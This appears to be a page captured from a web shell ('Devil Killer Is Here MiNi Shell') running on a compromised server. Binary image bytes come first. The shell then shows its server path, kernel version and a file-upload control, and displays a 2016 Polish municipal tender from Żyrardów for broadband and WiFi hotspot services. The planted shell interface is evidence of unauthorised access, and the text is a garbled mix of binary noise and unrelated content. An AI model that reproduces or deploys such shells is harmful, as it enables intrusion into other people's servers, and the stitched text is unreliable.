JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161212/364816-N-2016.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.zyrardow.pl' target='_blank'>http://www.zyrardow.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 364816 - 2016
              z dnia 2016-12-12 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Żyrardów:  Zadanie nr 1 
DOSTARCZENIE SZEROKOPASMOWEGO INTERNETU DLA 137 GOSPODARSTW DOMOWYCH ORAZ DLA 2 SZT. INFOKIOSKÓW W RAMACH TRWAŁOŚCI PROJEKTÓW: LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA ORAZ LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA - II etap 

Zadanie nr 2 
UTRZYMANIE  URZĄDZEŃ  NIEZBĘDNYCH DO TRANSMISJI SYGNAŁU WIFI W 10 LOKALIZACJACH (NA BUDYNKACH) NA  TERENIE MIASTA ŻYRARDÓW ORAZ ŚWIADCZENIE USŁUGI TRANSMISJI DANYCH, DOSTĘPU DO INTERNETU I WSPARCIA UŻYTKOWNIKÓW.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zadanie nr 1 DOSTARCZENIE SZEROKOPASMOWEGO INTERNETU DLA 137 GOSPODARSTW DOMOWYCH ORAZ DLA 2 SZT. INFOKIOSKÓW W RAMACH TRWAŁOŚCI PROJEKTÓW: LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA ORAZ LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA - II etap. Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego  w ramach Programu Operacyjnego Innowacyjna Gospodarka 2007-2013 Dotacje na Innowacje - Inwestujemy w Waszą przyszłość</div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Miasto  Żyrardów, krajowy numer identyfikacyjny
              75014865000000, ul.
              Plac Jana Pawła II 
              1,
              96300  
              Żyrardów, woj.
              mazowieckie, państwo
              Polska, tel.
              46 858 15 67, e-mail
              zamowieniapubliczne@zyrardow.pl, faks
              46 858 15 11.
              <br />
              Adres strony internetowej (URL): www.zyrardow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.zyrardow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br />
                Adres:
                <br />Plac Jana Pawła II nr 1 Biuro Obsługi Klienta</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> Zadanie nr 1 
DOSTARCZENIE SZEROKOPASMOWEGO INTERNETU DLA 137 GOSPODARSTW DOMOWYCH ORAZ DLA 2 SZT. INFOKIOSKÓW W RAMACH TRWAŁOŚCI PROJEKTÓW: LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA ORAZ LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA - II etap 

Zadanie nr 2 
UTRZYMANIE  URZĄDZEŃ  NIEZBĘDNYCH DO TRANSMISJI SYGNAŁU WIFI W 10 LOKALIZACJACH (NA BUDYNKACH) NA  TERENIE MIASTA ŻYRARDÓW ORAZ ŚWIADCZENIE USŁUGI TRANSMISJI DANYCH, DOSTĘPU DO INTERNETU I WSPARCIA UŻYTKOWNIKÓW.
<br /><b>Numer referencyjny: </b>ZP.271.3.15.2016.JM<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Zadanie 1:
Dostarczenie szerokopasmowego internetu dla 137 gospodarstw domowych oraz dla 2 szt. infokiosków w ramach trwałości projektów: LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA oraz LIKWIDACJA BARIER WYKLUCZENIA CYFROWEGO NA OBSZARZE MIASTA ŻYRARDOWA - II etap.
Szczegółowy opis przedmiotu zamówienia - wymagania dla dostępu do Internetu dla 137 gospodarstw domowych oraz dla 2 szt. infokiosków z terenu Miasta Żyrardowa
Parametr	Minimalne wymagane parametry
Parametry techniczne	1)	stały dostęp do sieci Internet,
2)	transfer do komputera użytkownika (download) minimum 1 Mb/s, 
3)	transfer od komputera użytkownika (upload) minimum 256 kbit/s,
4)	brak limitu transferu danych (zarówno pobieranych jak i wysyłanych).
Gwarancja	1)	Dostęp do Internetu z punktu widzenia Zamawiającego musi działać bezobsługowo, co oznacza, że nie jest wymagane podawanie loginów, haseł czy nr PIN aby mieć możliwość korzystania z Internetu.
2)	Dodatkowe, niezbędne urządzenia do prawidłowego działania łącza dostarcza Wykonawca,
3)	Zamawiający wyklucza rozwiązania oparte na kartach rozszerzeń montowanych wewnątrz obudowy komputera. Urządzenia dostępowe muszą być wyposażone w interfejs USB lub ETHERNET (RJ-45) umożliwiający podłączenie do komputera bez integracji w komputer.
4)	Urządzenia dodatkowe, muszą mieć funkcjonalność automatycznego instalowania sterowników i konfigurowania się w systemie operacyjnym po podłączeniu do komputera lub tylko podłączenie przez kabel sieciowy (RJ-45) lub USB,
5)	Wykonawca poniesie wszystkie koszty związane z instalacją i konfiguracją usługi. 
6)	W razie awarii Wykonawca przyjmie każde zgłoszenie w godzinach 9.00 - 20.00. Czas usunięcia awarii - maksymalni 24 godziny  Wykonwca okreo czas usunięcia awarii w ofercie(telefonicznie, mailem). W przypadku braku możliwości usunięcia wady lub usterki w sposób zdalny ich usunięcie musi nastąpić w ciągu 3 dni roboczych od dnia zgłoszenia (z możliwością przedłużenia tego okresu o czas naprawy urządzeń, na które udzielona jest gwarancja producenta),
7)	Wymiana uszkodzonych lub wadliwych części odpowiadających za łącze internetowe z wyłączeniem karty sieciowej, Wykonawca dokona na koszt własny. Czas realizacji 5 dni roboczych od chwili stwierdzenia uszkodzenia wymagającego naprawy (z możliwością przedłużenia tego okresu o czas naprawy urządzeń, na które udzielona jest gwarancja producenta)
8)	Koszty serwisu (w tym nieuzasadnione wezwania serwisu) są wliczone w opłatę abonamentową i nie podlegają dodatkowym opłatom. Wykonawca realizuje serwis od 1 stycznia 2017 r. do 31 grudnia 2018r.,
9)	Z każdej czynności serwisowania konieczny jest protokół potwierdzający wykonanie usługi podpisany przez użytkownika końcowego i Wykonawcę. W przypadku gdy naprawa wykonywana jest zdalnie potwierdzenie jej wykonania nie wymaga podpisu użytkownika końcowego, 
10)	Wykonawca udziela gwarancji na poprawne funkcjonowanie sygnału.
Inne	1)	Jeśli zachodzi taka potrzeba, zaleca się dokonanie wizji lokalnej warunków technicznych w miejscach zamieszkania użytkownika końcowego,
2)	Techniczne warunki dostarczenia usługi pozostają w gestii Wykonawcy, 
3)	Montaż fizyczny wszystkich elementów koniecznych do uruchomienia sygnału internetowego  (okablowanie, korytka, urządzenia aktywne, montaż w pomieszczeniach, montaż w punktach dystrybucyjnych, itd.),
4)	Konfiguracja łącza (uruchomienie sygnału),
5)	Koszty związane z realizacją zamówienia ponosi Wykonawca.
6)	Gwarancja możliwości przeniesienia usługi dostępu do Internetu pod inny wskazany przez Zamawiającego adres położony w granicach administracyjnych gminny Żyrardów, w przypadku zmiany miejsca stałego pobytu odbiorcy końcowego lub zmiany odbiorcy końcowego. Przy założeniach, że Wykonawca potwierdzi możliwości techniczne świadczenia usługi zgodnie z ww. parametrami technicznymi. Zamawiający zakłada nie więcej jak 30% zmian lokalizacji.

Zadanie 2:
Utrzymanie urządzeń niezbędnych do transmisji sygnału WiFi oraz świadczenie usługi transmisji danych, dostępu do Internetu i wsparcia użytkowników.
Szczegółowy opis przedmiotu zamówienia:
1.	Utrzymanie urządzeń niezbędnych do transmisji sygnału WiFi w 10 lokalizacjach (na budynkach) na terenie Miasta Żyrardów, zgodnie z poniższym wykazem.
Wykaz lokalizacji HotSpotów:
Lp	Adres budynku	Informacja o lokalizacji
1.		Plac Jana Pawła II 1	budynek Urzędu Miasta Żyrardowa
2.		ul. S. Okrzei 16	Skrzyżowanie z ul. Łukasińskiego
3.		ul. Środkowa 36	Budynek Specjalnego Ośrodka Szkolno  Wychowawczego
4.		ul. Bohaterów Warszawy 4	Budynek Zespołu Szkół nr 1
5.		ul. J. Mireckiego 56	Budynek Zespołu Szkół Publicznych nr 6
6.		ul. Jasna 11	Budynek Zespołu Szkół Publicznych nr 1
7.		ul. B. Limanowskiego 44	Budynek Kantoru
8.		ul. Sienkiewicza 2	Skrzyżowanie z ul. POW
9.		ul. S. Jodłowskiego 25/27	Budynek AQUA Sp. z o.o.
10.		ul. Roosevelta 2	Budynek Zespołu Szkół Publicznych nr 7

Opis zainstalowanych urządzeń - punktów dostępowych WiFi (Access Point - AP):
Nr	Parametr	Opis
1.		Typ interfejsu radiowego	WiFi: IEEE 802.11b/g
2.		Rodzaje pracy interfejsu radiowego	802.11b+g, 802.11b, 802.11g
3.		Zakres częstotliwości	2400-2497 MHz
4.		Kanały pracy radia	ETSI (EUR): 2412 ~ 2472 MHz (CH1-CH13)
5.		Pasmo pracy kanału	20 MHz
6.		Szybkości transmisji danych	802.11b: 1, 2, 5.5, 11 Mbps
802.11g: 6, 9, 12, 18, 24, 36, 48, 54 Mbps
7.		Technologia pracy interfejsu radiowego 802.11b	Direct Sequence-Spread Spectrum (DSSS)
8.		Techniki modulacji 802.11b	Differential Binary Phase Shift Keying (DBPSK) 1 Mbps
Differential Quadrature Phase Shift Keying (DQPSK) 2 Mbps;
Complementary Code Keying (CCK) 5.5 and 11 Mbps
9.		Maksymalna moc nadawania	20dBm
10.		Kontrola (zarządzanie) mocą nadawania	0% - 100%
11.		Złącza antenowe	2 x N-Type, 50 ohm
12.		Zasilanie AC (prąd zmienny)	85-260VAC, 47-63Hz
13.		Maksymalny pobór mocy (prąd zmienny)	2,5A
14.		Zasilanie DC (prąd stały)	42 VDC to 60 VDC
15.		Maksymalny pobór mocy (prąd stały)	3,5A
16.		Przełączania zasilania - sposób pracy przy podłączonym zarówno zasilaniu AC i DC	Zasilanie AC jako główne, przełączenie na zasilanie DC w momencie zaniku zasilania głównego
17.		Temperatura pracy urządzeń	od -40oC  do  +55oC
18.		Zabezpieczenie przeciwwilgociowe - urządzenie WiFi oraz wszystkie złącza	IP-67 (praca na zewnątrz, sprzęt klasy operatorskiej)
19.		Praca przy maksymalnym wietrze	do 150 Km/godzinę
20.		Wytrzymałość urządzeń na wiatr	do 200 Km/ godzinę
21.		Pozytywna weryfikacja wymagań przeciwzakłóceniowych dla urządzeń cyfrowych klasy B	Sprzęt przeszedł testy
22.		Spełnianie wymagań Unii Europejskiej w zakresie dyrektyw R&amp;TTE (1999/5/EC)	EN 60950 (IEC 60950)  bezpieczeństwo produktu;
EN 300 328  techn. wymagania dla urządzeń radiowych 2.4 GHz (11b/g);
EN 301 489-1 / EN 301 489-17  techn. wymagania dla zasilania stałego DC;
Wymagania EMC dla urządzeń radiowych (EN55022 CE Class B, FCC Class B Part 15);
23.		Zysk antenowy	8dBi
24.		Promieniowanie anten: poziome/pionowe	360o / 15 o  - anteny dookólne
25.		Sposób realizacji transmisji do AP	standard Ethernet (w tym PoE  zasilanie poprzez Ethernet)
26.		skanowanie i dobór częstotliwości  kanału pracy	Automatyczne i ręczne

2.	Prowadzenie systemu rejestracji, logowania i autoryzacji Użytkowników HotSpotów, 
wg poniższego scenariusza:
a.	Każdorazowa próba skorzystania przez Użytkownika z HotSpota musi być poprzedzona zalogowaniem się na stronie logowania.
b.	Pierwsza próba skorzystania przez Użytkownika z HotSpota musi zostać poprzedzona Rejestracją użytkownika na stronie rejestracji.
3.	Świadczenie usługi transmisji sygnału do 10 HotSpotów w paśmie licencjonowanym WIMAX 3,5 -3,8 GHz przez okres od 01 stycznia 2017 do 31 grudnia 2018. (Wykonawca powinien posiadać licencję na pasmo WIMAX 3,6-3,8 GHz przynajmniej do 31 grudnia 2018 r.). Sygnał transmitowany do każdego z HotSpotów powinien być o prędkości minimum 1 Mb/s.
4.	Zapewnienie w oparciu o wybudowaną sieć dostępu do bezprzewodowego Internetu dla zainteresowanych użytkowników z terenu Miasta Żyrardów - udostępnienie dla każdego użytkownika połączenia internetowego o prędkości max 144 kb/s z blokadą stron pornograficznych i sieci p2p (zrealizowaną dodatkowo poprzez ograniczenie długości jednorazowej sesji do 1 godziny).
5.	Zapewnienie utrzymania sieci, wsparcia użytkowników HotSpotów (pomoc techniczna dla użytkowników HotSpotów w przypadku np. problemów związanych z możliwością skorzystania z usługi lub nie działaniem usługi, realizowana w odpowiedzi na zgłoszenia telefoniczne i emailowe. Wykonawca stworzy warunki umożliwiające realizacje pomocy technicznej  specjalny nr telefonu oraz adres e-mail pod którym będzie dostępny).
6.	Zapewnienie gwarancji parametrów technicznych i bezpieczeństwa sieci bezprzewodowej,
7.	Zapewnienie Zamawiającemu dostępu do statystyk w celu monitorowania działania sieci i ilości korzystających osób minimum raz na miesiąc (opcjonalnie poprzez dostęp do panelu zarządzania siecią  bez możliwości modyfikacji danych).
8.	Na wniosek Zamawiającego Wykonawca przeszkoli personel Zamawiającego w zakresie odczytywania statystyk z działania sieci i obsługi panelu zarządzania siecią w celu monitorowania działania sieci i uzyskania niezbędnych informacji.
9.	Zapewnienie symetrycznego łącza internetowego BDI 10Mb dla potrzeb Urzędu Miasta Żyrardów o następujących parametrach:
a.	symetryczne łącze przewodowe, lub radiowe o przepustowości 10 Mbit/s;
b.	łącze zakończone stykiem Ethernet RJ-45 we wskazanym przez Zamawiającego miejscu w serwerowni;
c.	w ramach dostępu do łącza internetowego zapewnienie dla Zamawiającego przez Wykonawcę 4 publicznych adresów IP;
d.	Gwarantowanie przesyłania ciągłego strumienia danych o przepustowości, co najmniej 10 Mbit/s, do operatorów trzecich, tj. krajowych operatorów internetowych, z którymi Wykonawca posiada, co najmniej dwa niezależne punkty wymiany ruchu oraz międzynarodowych operatorów internetowych (zagranicznych operatorów internetowych), z którymi Wykonawca posiada, co najmniej dwa niezależne, bezpośrednie punkty styku;
e.	utrzymanie całodobowego serwisu, we wszystkie dni w tygodniu;
f.	zapewnienie następujących minimalnych parametrów SLA:
I.	miesięczna Dostępność Usługi  99,5%
II.	czas Reakcji na awarię  1 godzina,
III.	czas Usunięcia awarii  12 godzin.
<br /><br /><b>II.5) Główny kod CPV: </b>72410000-7<br /><b> Dodatkowe kody CPV:</b>72411000-4<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 31/12/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający wymaga aby Wykonawca był wpisany do Rejestru Przedsiębiorców Telekomunikacyjnych prowadzonego przez Urząd Komunikacji Elektronicznej(dla zadnia 1 i 2)
Wykonawca posiadał licencję na pasmo WIMAX 3,5-3,8 GHz przynajmniej do 31.12.2017 roku.(dla zadania nr 2)<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie stawia warunku w tym zakresie<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający wymaga, aby Wykonawca spełniał minimalne warunki dotyczące doświadczenia tj. w okresie ostatnich trzech lat przed upływem terminu składania ofert, 
a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wykonał należycie co najmniej 1 usługę polegającą na dostarczeniu szerokopasmowego internetu dla minimum 100 gospodarstw domowych.(dla zadania nr 1).
Zamawiający wymaga, aby Wykonawca wykazał, że :
a)	Posiada przynajmniej 5 stacji bazowych w technologii WIMAX, w oparciu o które świadczą komercyjne usługi dla min. 1000 użytkowników;
b)	spełnia minimalne warunki dotyczące doświadczenia tj. zrealizował podobną usługę w oparciu o min. 10 stacji bazowych pracujących w paśmie nielicencjonowanym zakresu częstotliwości dla sieci WiFi np. 2,4GHz.
(dla zadania nr 2)
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
